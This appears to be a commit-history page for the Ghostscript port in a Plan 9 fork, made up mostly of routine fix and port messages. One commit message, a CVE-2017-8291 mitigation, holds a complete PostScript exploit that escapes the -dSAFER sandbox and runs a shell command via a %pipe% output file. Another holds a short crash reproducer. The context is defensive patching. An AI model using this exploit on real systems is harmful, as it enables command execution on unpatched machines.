xfnw/plan9fox
1
0
Fork 0
Code Issues Pull requests Projects Releases Wiki Activity
9099 commits 1 branch 0 tags 118 MiB
Commit graph

32 commits

Author SHA1 Message Date
cinap_lenrek 0af7d1fe35 gs: apply mitigations against CVE-2017-8291 (thanks jsmoody) 
To reproduce:
gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100


/size_from  10000      def
/size_step    500      def
/size_to   65000      def
/enlarge    1000      def

%/bigarr 65000 array def

0
size_from size_step size_to {
    pop
    1 add
} for

/buffercount exch def

/buffersizes buffercount array def


0
size_from size_step size_to {
    buffersizes exch 2 index exch put
    1 add
} for
pop

/buffers buffercount array def

0 1 buffercount 1 sub {
    /ind exch def
    buffersizes ind get /cursize exch def
    cursize string /curbuf exch def
    buffers ind curbuf put
    cursize 16 sub 1 cursize 1 sub {
        curbuf exch 255 put
    } for
} for


/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def

enlarge array aload

{
    .eqproc
    buffersearchvars 0 buffersearchvars 0 get 1 add put
    buffersearchvars 1 0 put
    buffersearchvars 2 0 put
    buffercount {
        buffers buffersearchvars 1 get get
        buffersizes buffersearchvars 1 get get
        16 sub get
        254 le {
            buffersearchvars 2 1 put
            buffersearchvars 3 buffers buffersearchvars 1 get get put
            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
        } if
        buffersearchvars 1 buffersearchvars 1 get 1 add put
    } repeat

    buffersearchvars 2 get 1 ge {
        exit
    } if
    %(.) print
} loop

.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put


buffersearchvars 0 get array aload

sdevice 0 get
16#3e8 0 put

sdevice 0 get
16#3b0 0 put

sdevice 0 get
16#3f0 0 put


currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf

.
 2019-06-21 18:57:20 +02:00
cinap_lenrek c9a1045d49 gs: fix missing type check in ztype (thanks jsmoody) 
to reproduce:

gs <<.
null [[][][][][][][][][][][][][][][]] .type
.
 2019-05-24 14:17:18 +02:00
cinap_lenrek e55778d67e gs: apply fixes for CVE-2018-16509 (thanks jsmoody) 2019-05-23 14:59:28 +02:00
cinap_lenrek bbf532dba8 gs: arm64 support 2019-05-03 21:10:45 +02:00
cinap_lenrek 5f5caa6733 gs: avoid stupid shifts by casting to uint64_t 2019-05-03 21:10:01 +02:00
mischief d18440d992 gs: validate parameter is dict in .initialize_dsc_parse 
gs bug 697190, upstream commit 875a0095

also check gs_alloc_struct return value from upstream commit a2afc66d
 2017-03-14 00:48:50 -07:00
mischief 07a14612a1 gs: check for sufficient params in .sethalftone5 
ghostscript bug 697203, upstream commit f5c7555c303
 2017-03-13 18:12:17 -07:00
cinap_lenrek 9b2d3ed37a gs: fix dangleing pointer crash with "lock" (ghostscript Bug 697204) 2017-03-13 18:56:52 +01:00
cinap_lenrek 986886f2b8 retire the dec alpha port 2016-05-04 16:11:48 +02:00
cinap_lenrek 8f4db30e78 gs: replace openssl aes implementation with ape/libsec 2016-04-11 20:27:50 +02:00
glenda c4fdc6bfdb fix fuckup 2015-08-25 09:35:10 +00:00
mischief 6b402b83cf import E script from bell labs 2015-08-25 02:07:46 -07:00
cinap_lenrek 2fe2ffe813 gs: fix alignment bug in image_render_interpolate() 2015-08-16 18:20:22 +02:00
cinap_lenrek 79213052a2 gs: fix build for objtype=spim 2015-08-08 08:31:49 +02:00
cinap_lenrek 81cbff917f gs: avoid 6c type propagation / constant folding issue for set_cb_end() 
6c changed "- cmd_lagest_size + 1" into a *unsigned* 32bit constant. which
got added to 64bit pointer making pcb->limit > pcb->end resulting
in errors for partial commands in the buffer. removing the parentesis
propagates the operation to 64bit.
 2015-04-17 06:18:43 +02:00
cinap_lenrek b69556052e gs: fix bug 694539. Reading off the end of the cbuf when dash pattern len is max 2015-03-08 05:27:24 +01:00
cinap_lenrek ccb624e2bb gs: backport 16MB string support 2015-02-21 10:55:09 +01:00
cinap_lenrek 0b016a77e4 gs: backport aes support for pdf-1.6 2015-02-20 00:21:45 +01:00
mischief cd3a742b32 all: typo fixes from ray@raylai.com 2014-11-07 10:39:50 -08:00
cinap_lenrek ff7d68e41a gs: fix /undefined in --setcolor-- errors on amd64 2014-05-05 00:49:26 +02:00
cinap_lenrek 826f4c0daf gs: remove PStorage data type from ttf interpreter 
i dont see that pointers are stored in PStorage at all,
so just use PLong directly avoding all this confusion.
 2014-05-04 00:17:27 +02:00
cinap_lenrek 9cc9d6113c gs: fix truetype interpreter for amd64 2014-05-04 23:31:59 +02:00
cinap_lenrek 8006695405 gs: amd64 support 2014-02-01 10:28:33 +01:00
cinap_lenrek b1955840c5 rename ape manpages so they dont get filtered out as object files 2011-05-04 06:19:09 +00:00
cinap_lenrek 9d24a107a5 boot(8): changed tread to read, other: fix perms 2011-04-18 01:59:36 +00:00
sl 69e36b384a remove junk generated by build. 2011-04-15 15:53:56 +00:00
sl 19ab1fbdb6 add /sys/lib/dist/bin/386, required for build. 2011-04-15 15:49:51 +00:00
cinap_lenrek 85b5f73c40 perms 2011-04-11 15:20:31 +00:00
cinap_lenrek 9ace6c0363 ape dirs 2011-03-30 18:46:53 +00:00
Taru Karttunen a9060cc06b Import sources from 2011-03-30 iso image - lib 2011-03-30 19:35:09 +03:00
cinap_lenrek c3ceeded2d ... 2011-03-30 16:05:55 +00:00
Taru Karttunen e5888a1ffd Import sources from 2011-03-30 iso image 2011-03-30 15:46:40 +03:00